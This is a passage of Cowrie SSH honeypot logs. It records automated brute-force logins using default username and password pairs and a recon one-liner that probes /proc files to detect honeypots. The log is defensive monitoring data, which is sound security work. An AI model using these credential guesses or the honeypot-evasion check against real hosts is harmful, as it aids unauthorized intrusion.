{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:50:41.329905Z","src_ip":"212.227.125.160","session":"896971a367f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57666,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa4bb9a1be94","protocol":"ssh","message":"New connection: 212.227.235.229:57666 (1.2.3.4:22) [session: aa4bb9a1be94]","sensor":"my-vps","timestamp":"2025-08-26T11:50:45.014075Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:50:45.015097Z","src_ip":"212.227.235.229","session":"aa4bb9a1be94"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-26T11:50:45.174228Z","src_ip":"212.227.235.229","session":"aa4bb9a1be94"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq123456","message":"login attempt [root/Qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:50:45.653864Z","src_ip":"212.227.235.229","session":"aa4bb9a1be94"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51732,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9d81585cf29","protocol":"ssh","message":"New connection: 212.227.125.160:51732 (1.2.3.4:22) [session: a9d81585cf29]","sensor":"my-vps","timestamp":"2025-08-26T11:50:45.746427Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:50:45.928816Z","src_ip":"212.227.125.160","session":"a9d81585cf29"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:50:45.929528Z","src_ip":"212.227.125.160","session":"a9d81585cf29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:50:46.046960Z","src_ip":"212.227.235.229","session":"aa4bb9a1be94"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-26T11:50:46.047652Z","src_ip":"212.227.235.229","session":"aa4bb9a1be94"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:50:46.048082Z","src_ip":"212.227.235.229","session":"aa4bb9a1be94"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-26T11:50:46.049431Z","src_ip":"212.227.235.229","session":"aa4bb9a1be94"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:50:46.049993Z","src_ip":"212.227.235.229","session":"aa4bb9a1be94"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-26T11:50:46.051794Z","src_ip":"212.227.235.229","session":"aa4bb9a1be94"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-26T11:50:46.052825Z","src_ip":"212.227.235.229","session":"aa4bb9a1be94"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-26T11:50:46.053766Z","src_ip":"212.227.235.229","session":"aa4bb9a1be94"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-26T11:50:46.055015Z","src_ip":"212.227.235.229","session":"aa4bb9a1be94"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-26T11:50:46.056567Z","src_ip":"212.227.235.229","session":"aa4bb9a1be94"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-26T11:50:46.057420Z","src_ip":"212.227.235.229","session":"aa4bb9a1be94"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-26T11:50:46.218819Z","src_ip":"212.227.235.229","session":"aa4bb9a1be94"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:50:46.220043Z","src_ip":"212.227.235.229","session":"aa4bb9a1be94"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:50:46.636898Z","src_ip":"212.227.235.229","session":"aa4bb9a1be94"}
{"eventid":"cowrie.login.failed","username":"plex","password":"plex","message":"login attempt [plex/plex] failed","sensor":"my-vps","timestamp":"2025-08-26T11:50:46.854507Z","src_ip":"212.227.125.160","session":"a9d81585cf29"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:50:47.908373Z","src_ip":"212.227.125.160","session":"a9d81585cf29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51874,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7c556b0c58c","protocol":"ssh","message":"New connection: 212.227.125.160:51874 (1.2.3.4:22) [session: c7c556b0c58c]","sensor":"my-vps","timestamp":"2025-08-26T11:50:51.812587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:50:51.916818Z","src_ip":"212.227.125.160","session":"c7c556b0c58c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:50:51.917496Z","src_ip":"212.227.125.160","session":"c7c556b0c58c"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":37852,"dst_ip":"1.2.3.4","dst_port":22,"session":"08db7f4fee6d","protocol":"ssh","message":"New connection: 196.251.86.249:37852 (1.2.3.4:22) [session: 08db7f4fee6d]","sensor":"my-vps","timestamp":"2025-08-26T11:50:52.135182Z"}
{"eventid":"cowrie.login.failed","username":"tbds","password":"tbds","message":"login attempt [tbds/tbds] failed","sensor":"my-vps","timestamp":"2025-08-26T11:50:52.205418Z","src_ip":"212.227.125.160","session":"c7c556b0c58c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:50:52.790112Z","src_ip":"196.251.86.249","session":"08db7f4fee6d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:50:52.790835Z","src_ip":"196.251.86.249","session":"08db7f4fee6d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:50:53.385883Z","src_ip":"212.227.125.160","session":"c7c556b0c58c"}
{"eventid":"cowrie.login.failed","username":"git","password":"P@ssw0rd","message":"login attempt [git/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T11:50:54.699716Z","src_ip":"196.251.86.249","session":"08db7f4fee6d"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":51970,"dst_ip":"1.2.3.4","dst_port":22,"session":"879f0842d55b","protocol":"ssh","message":"New connection: 83.168.105.65:51970 (1.2.3.4:22) [session: 879f0842d55b]","sensor":"my-vps","timestamp":"2025-08-26T11:50:55.048723Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:50:55.049517Z","src_ip":"83.168.105.65","session":"879f0842d55b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:50:55.085746Z","src_ip":"83.168.105.65","session":"879f0842d55b"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"jenkins","message":"login attempt [jenkins/jenkins] failed","sensor":"my-vps","timestamp":"2025-08-26T11:50:55.195806Z","src_ip":"83.168.105.65","session":"879f0842d55b"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:50:56.233954Z","src_ip":"83.168.105.65","session":"879f0842d55b"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:50:56.308312Z","src_ip":"196.251.86.249","session":"08db7f4fee6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52640,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5ae977d4adb","protocol":"ssh","message":"New connection: 212.227.125.160:52640 (1.2.3.4:22) [session: d5ae977d4adb]","sensor":"my-vps","timestamp":"2025-08-26T11:50:57.938780Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:50:58.193778Z","src_ip":"212.227.125.160","session":"d5ae977d4adb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:50:58.194433Z","src_ip":"212.227.125.160","session":"d5ae977d4adb"}
{"eventid":"cowrie.login.failed","username":"kafka","password":"kafka","message":"login attempt [kafka/kafka] failed","sensor":"my-vps","timestamp":"2025-08-26T11:50:59.113551Z","src_ip":"212.227.125.160","session":"d5ae977d4adb"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:51:00.168996Z","src_ip":"212.227.125.160","session":"d5ae977d4adb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53412,"dst_ip":"1.2.3.4","dst_port":22,"session":"1020ee6f0ebb","protocol":"ssh","message":"New connection: 212.227.125.160:53412 (1.2.3.4:22) [session: 1020ee6f0ebb]","sensor":"my-vps","timestamp":"2025-08-26T11:51:03.995070Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:51:03.995935Z","src_ip":"212.227.125.160","session":"1020ee6f0ebb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:51:04.048543Z","src_ip":"212.227.125.160","session":"1020ee6f0ebb"}
{"eventid":"cowrie.login.failed","username":"user4","password":"user4","message":"login attempt [user4/user4] failed","sensor":"my-vps","timestamp":"2025-08-26T11:51:04.208179Z","src_ip":"212.227.125.160","session":"1020ee6f0ebb"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:51:05.339563Z","src_ip":"212.227.125.160","session":"1020ee6f0ebb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54182,"dst_ip":"1.2.3.4","dst_port":22,"session":"b427c32500ff","protocol":"ssh","message":"New connection: 212.227.125.160:54182 (1.2.3.4:22) [session: b427c32500ff]","sensor":"my-vps","timestamp":"2025-08-26T11:51:10.143953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:51:10.144837Z","src_ip":"212.227.125.160","session":"b427c32500ff"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:51:10.196408Z","src_ip":"212.227.125.160","session":"b427c32500ff"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":33272,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f95a93bc18c","protocol":"ssh","message":"New connection: 83.168.105.65:33272 (1.2.3.4:22) [session: 9f95a93bc18c]","sensor":"my-vps","timestamp":"2025-08-26T11:51:10.581733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:51:10.583215Z","src_ip":"83.168.105.65","session":"9f95a93bc18c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-25